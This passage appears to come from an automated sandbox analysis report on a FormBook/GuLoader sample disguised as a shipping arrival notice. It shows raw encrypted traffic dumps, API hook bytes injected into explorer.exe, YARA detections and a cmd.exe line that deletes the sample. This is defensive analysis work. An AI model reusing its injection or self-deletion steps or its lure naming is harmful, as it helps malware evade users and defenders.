                                    2021-09-13 20:56:57 UTC80INData Raw: 46 8b 89 0e c2 8c 77 43 10 05 59 1e 65 0a 43 42 77 1f f9 1a 6e ba 76 e3 87 b5 75 b3 ad 79 6d b7 a8 0c 06 06 6d bc 14 64 cb b7 11 d2 cb ef c5 07 b8 83 78 cb 0e 47 32 40 f9 2a a4 47 1a f6 6c 91 0b 97 81 eb 5f 06 e3 6f fd 2a 85 31 00 a2 b2 4a e5 99 39 ae a5 62 84 c5 d6 7f b7 12 f8 ab 9d 42 95 b1 05 21 2a 33 a4 65 47 4e 88 6a 48 16 b1 b6 46 d8 48 2e e5 74 55 bf bc 6b 5a 5f 28 c7 c1 c0 aa 05 0a 14 87 89 ab 17 29 45 82 e5 e8 90 f2 9a e4 14 22 ad 6f 81 59 f5 65 8c 48 5b 2b 8f 98 b9 1c 72 d3 84 76 1c 0e aa 12 7c 08 4f 2b 5c f7 fa d1 10 10 92 de fb 17 80 b8 36 af 49 cb 7f f0 b0 be 79 88 a2 a4 36 bf 14 57 d6 b7 26 0e 5a 9d dd 82 bb ec 8e 41 1a 65 b8 8e cc be 7e 5f 6f 54 88 32 1b 1e 2b 3d 8d d9 7e 99 2d 4a 00 0c fd 53 3e 1b d6 6a c3 1c 00 78 8f ec 2a 97 60 77 09 21
                                    Data Ascii: FwCYeCBwnvuymmdxG2@*Gl_o*1J9bB!*3eGNjHFH.tUkZ_()E"oYeH[+rv|O+\6Iy6W&ZAe~_oT2+=~-JS>jx*`w!
                                    2021-09-13 20:56:57 UTC96INData Raw: e2 9d b4 1b 2c 91 b3 a8 c4 2a af c4 ab b9 0a 46 32 9b c1 f2 2b 95 51 88 cf 68 40 5b a3 10 30 de 87 aa 07 35 f1 9b f9 12 c5 6b 34 ea 83 3f 1f 8d b1 f2 b8 8c dc 33 a1 4b 0c 6a 70 be c9 3d d4 04 80 48 91 6a 9d 4a 89 b3 98 1b 83 16 17 72 7e 54 3a 46 a6 d3 d2 69 47 c4 29 b9 d0 a9 18 55 30 0e b7 b3 cb fc 05 f8 61 8c 48 69 6b 6c f5 ad 84 91 5a 86 dc e7 16 53 9a 99 1f f8 b0 c1 3e 38 8e 4e 8a 34 60 77 83 d6 7e f0 2e 90 7a f1 90 e0 20 fe fd e4 8f de a6 08 56 04 5f 71 a9 2d 08 ed 0a 62 ea 36 f2 24 72 c8 8b cd c3 94 24 56 9a 2a 39 46 58 f2 d4 0a 92 b2 4c f4 01 45 8d 44 c2 65 ca 34 eb 88 7e 5f bb 06 82 88 46 d3 a9 98 4d 89 20 eb 9e 69 23 7f 09 35 37 f5 02 d1 ec b1 8c 51 fc 89 30 49 27 89 29 96 98 b3 72 6a 90 39 bf 00 0b 94 fd 26 aa 15 af 5c c3 b7 79 66 0e 17 1a e0 12
                                    Data Ascii: ,*F2+Qh@[05k4?3Kjp=HjJr~T:FiG)U0aHiklZS>8N4`w~.z V_q-b6$r$V*9FXLEDe4~_FM i#57Q0I')rj9&\yf
                                    2021-09-13 20:56:57 UTC112INData Raw: 2e 40 7b a3 cb bd 51 5e 5a 8b 8a 05 d1 ea 99 43 08 24 b4 1b 7d f2 8b d4 69 ba 0f 1e 6c 35 da 13 98 10 28 a6 d3 0b f7 f2 2c 12 ae cd 14 96 68 2f ce de a0 22 14 3c de 38 07 e9 07 cd 2c 01 37 8f f5 d2 ec 5b 5c e3 e1 a8 86 8c 3b 67 e8 6a 73 bf b1 a9 2d 7e d1 4f 99 36 8c 70 eb 91 81 ee 9c 27 69 b7 18 ab c4 48 b2 01 bc 29 1f fa 15 6c 40 b5 34 7b 51 b3 30 54 67 73 3b 6e ee ac 7c 02 13 54 38 b0 1e bd 27 5a cc 58 8b 59 44 a4 be aa 1e db b4 00 26 9c 60 d8 fc 57 4c d4 87 1f 6b ce 1a a0 49 ef 0c c4 e4 80 fc 97 ca b9 1a b3 0b 03 55 17 8e 3c 50 b9 c7 1f 71 88 f4 1b c5 7e cb 32 f8 9f 52 20 b2 4f 71 87 9e a7 d0 3d 2e 54 6f cf ec 0d 2e 74 6a da 29 20 90 8b 0e 94 3a 56 99 1e 61 79 b9 18 b2 e5 9a 12 5d c7 eb 2c a3 13 ba af 4f 31 1a 05 fd 85 7e 5c a4 e0 77 2f 42 f6 8b 1a 55
                                    Data Ascii: .@{Q^ZC$}il5(,h/"<8,7[\;gjs-~O6p'iH)l@4{Q0Tgs;n|T8'ZXYD&`WLkIU<Pq~2R Oq=.To.tj) :Vay],O1~\w/BU
                                    2021-09-13 20:56:57 UTC128INData Raw: 8b 54 70 14 9b 22 85 46 00 c4 db 34 92 a4 60 b7 99 de ea 65 4c cd 4f 8f 14 cd 95 26 44 ad e2 30 94 06 68 92 34 c0 1e 9f c3 e9 59 1f 60 a6 90 4f 92 f8 2b b5 94 82 ca ff 85 94 af 31 35 da e8 7f 42 35 e2 d6 69 84 fc dc 93 4a b9 e1 66 e2 03 84 15 79 d4 cb b1 54 1f 4c fc 64 f8 dc a6 ff 4c a0 54 da 51 92 e1 c4 5e 18 7c e7 16 26 86 dd e8 7e 24 32 11 ad 82 c8 df 85 78 90 c9 6e e9 16 a1 a4 e2 45 79 5c 3a 54 a9 cd 48 3d 0d 3e c1 e4 bd b3 6e 84 c9 c7 05 04 4a c1 ea f3 2c 20 b7 99 8b 17 9a cb 27 b8 c4 7d b5 a7 6e ba 3c 71 ce 6c d2 8c 52 b0 ee 0c 5d 93 5c 35 1b 73 18 52 bb f0 e6 96 61 4d 28 73 ab e7 2a 0c 29 1b 16 c4 f1 7d 7b 39 46 d8 b6 95 01 38 2c c2 df b2 1d 7c 20 17 d5 5b 80 35 40 2d fd 80 b5 bb db f0 fd 28 c4 bb 32 73 0f 03 bd 61 a7 87 16 e3 ad b1 42 00 85 d3 db
                                    Data Ascii: Tp"F4`eLO&D0h4Y`O+15B5iJfyTLdLTQ^|&~$2xnEy\:TH=>nJ, '}n<qlR]\5sRaM(s*)}{9F8,| [5@-(2saB
                                    2021-09-13 20:56:57 UTC144INData Raw: e6 0d 80 81 80 49 23 f5 af 8f 57 18 ac ef 93 a7 e1 66 0c 79 88 9e 6a 89 6e ec 9b da cf 98 04 53 7d be 1a b7 19 d6 55 fa de f1 1e 6d d0 54 f5 83 b2 92 f9 d0 3e 24 55 88 73 63 ec ff 16 6f 05 b7 77 8b 20 c8 6f 07 23 bd e6 31 97 87 95 50 e2 7d 34 be 56 50 8d aa 0e 91 98 31 74 8c 80 a5 df fa 7f 8a 67 4e 7e 3f ff 7e b6 cc 66 7b 68 b1 74 88 7f e2 74 dc 9b 16 1a b2 aa 45 35 e4 22 46 1b 3a ea ce 6b 50 c8 a4 97 0f 2d 7f bb 41 65 80 f9 66 f9 ef 84 98 e4 6c c9 d9 5b b3 45 38 c3 b1 43 9d 89 f8 6c bb 0e a8 53 68 49 c6 b2 c0 67 cd 53 4e e1 ef 24 64 d0 95 29 01 42 bc 86 aa 25 ef c8 76 91 d2 f7 93 e1 18 4a 92 8d a4 31 33 90 58 e5 c8 a4 1d ba 92 97 c9 3a 6b d0 07 d7 7f 5e 63 26 e1 a0 3b 12 54 32 d0 c2 9d 22 c5 b3 e7 cb 79 fb 18 85 52 e8 82 af c4 55 97 71 b1 1d 56 c5 75 ca
                                    Data Ascii: I#WfyjnS}UmT>$Uscow o#1P}4VP1tgN~?~f{httE5"F:kP-Aefl[E8ClShIgSN$d)B%vJ13X:k^c&;T2"yRUqVu
                                    2021-09-13 20:56:57 UTC160INData Raw: e1 15 74 b9 2a 3c 6b ee ab 2f 1e 0e 13 4a bf df 2e e0 e7 86 63 56 24 23 92 21 82 03 95 cd ce a8 e2 57 5d 67 6f d2 82 a6 63 63 45 d3 b8 35 e9 da b5 c0 9f ba 1f 65 4f 26 14 5f ba 37 ae a8 27 be fe c9 4a ab 97 fd 47 08 a7 70 ea 00 4b 32 ab a5 0b 66 8d be ec 87 9a 5e 80 e0 91 1b 64 ea a3 22 93 a2 aa 42 0b 0a 0e dd 66 d2 6e 6e 32 ed c4 b8 98 be 9a 71 c4 98 e0 08 e3 97 ee c4 4d c3 94 d6 5a fb 3b b6 14 24 97 51 9d 13 d4 69 4e 75 dc a3 4f 54 ea ef 05 e4 63 e1 50 fb 27 a0 c4 d0 ad 50 6d 4e dc 09 8e 09 53 4e 71 32 03 15 6f 76 d9 ff b8 14 37 5a 84 c9 20 b0 a8 a1 7f 16 4c 60 0c 43 67 af 03 25 83 2b d3 0e c9 dc 51 b8 ee 10 80 6f 93 d3 69 dc fd 32 f7 d1 02 77 a7 37 77 c8 65 5d 26 cf 71 ed 64 13 09 92 91 99 ae 2e 54 bd 0c 79 67 9e 57 ea 8a 0d 4d 54 04 38 86 fc 1f b5 6d
                                    Data Ascii: t*<k/J.cV$#!W]goccE5eO&_7'JGpK2f^d"Bfnn2qMZ;$QiNuOTcP'PmNSNq2ov7Z L`Cg%+Qoi2w7we]&qd.TygWMT8m
                                    2021-09-13 20:56:57 UTC176INData Raw: f5 b7 3e 0c e9 08 bd 1a 59 21 27 36 83 92 56 9c 38 cf 21 1c d1 d5 38 ca e7 a6 20 c3 cf 26 d3 a2 46 ea 62 95 d5 38 68 a7 be ab 8b b4 35 0c 54 25 72 b2 0a 64 a6 af 0f d6 19 c6 d5 86 58 e9 2b 02 87 56 bf c8 46 a2 3e e5 a7 ea 59 47 77 70 07 b8 b4 07 c6 dc aa f4 e6 9b 3f 2a 1d 26 64 1d 7f 9a 80 b8 f9 e2 d6 b8 48 f9 e6 ef bc aa ac 03 5b c3 43 a3 62 b2 8b 25 93 80 74 8a ba b1 13 bf 4e 0c bd 70 78 ff 92 fe 21 0e 25 d2 6f 2b b5 97 fe 36 a4 a3 38 d8 b9 46 a2 06 88 50 ef 0c c5 7a 73 59 4a 86 45 78 75 26 d2 e0 c2 73 0e bb 0d bb f5 e8 35 3f ec 83 53 18 da 25 cf b0 eb bc 90 55 4d cc 77 6c 48 65 81 a3 8d 95 5b e8 85 f2 17 62 60 38 d7 8d 6e c7 82 61 e9 a3 0e f8 ed f4 b8 9a 42 1c f1 33 59 04 dc b3 b5 7c 8f 3f 81 c7 0e 52 ff 6b dc 54 09 01 d8 ed b7 5b 65 17 1f 83 a0 2e 9a
                                    Data Ascii: >Y!'6V8!8 &Fb8h5T%rdX+VF>YGwp?*&dH[Cb%tNpx!%o+68FPzsYJExu&s5?S%UMwlHe[b`8naB3Y|?RkT[e.


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE2
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE2
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE2
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE2

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Start time:22:52:50
                                    Start date:13/09/2021
                                    Path:C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
                                    Imagebase:0x400000
                                    File size:466944 bytes
                                    MD5 hash:E8BCEEA59B2074BD08BF68AB55ECDF3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Visual Basic
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.929197382.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:low

                                    General

                                    Start time:22:54:55
                                    Start date:13/09/2021
                                    Path:C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
                                    Imagebase:0x400000
                                    File size:466944 bytes
                                    MD5 hash:E8BCEEA59B2074BD08BF68AB55ECDF3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:22:56:58
                                    Start date:13/09/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff6fee60000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:22:57:25
                                    Start date:13/09/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe
                                    Imagebase:0x10e0000
                                    File size:61952 bytes
                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, Author: Florian Roth
                                    Reputation:high

                                    General

                                    Start time:22:57:30
                                    Start date:13/09/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
                                    Imagebase:0x11d0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:22:57:31
                                    Start date:13/09/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff724c50000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis

                                    Reset < >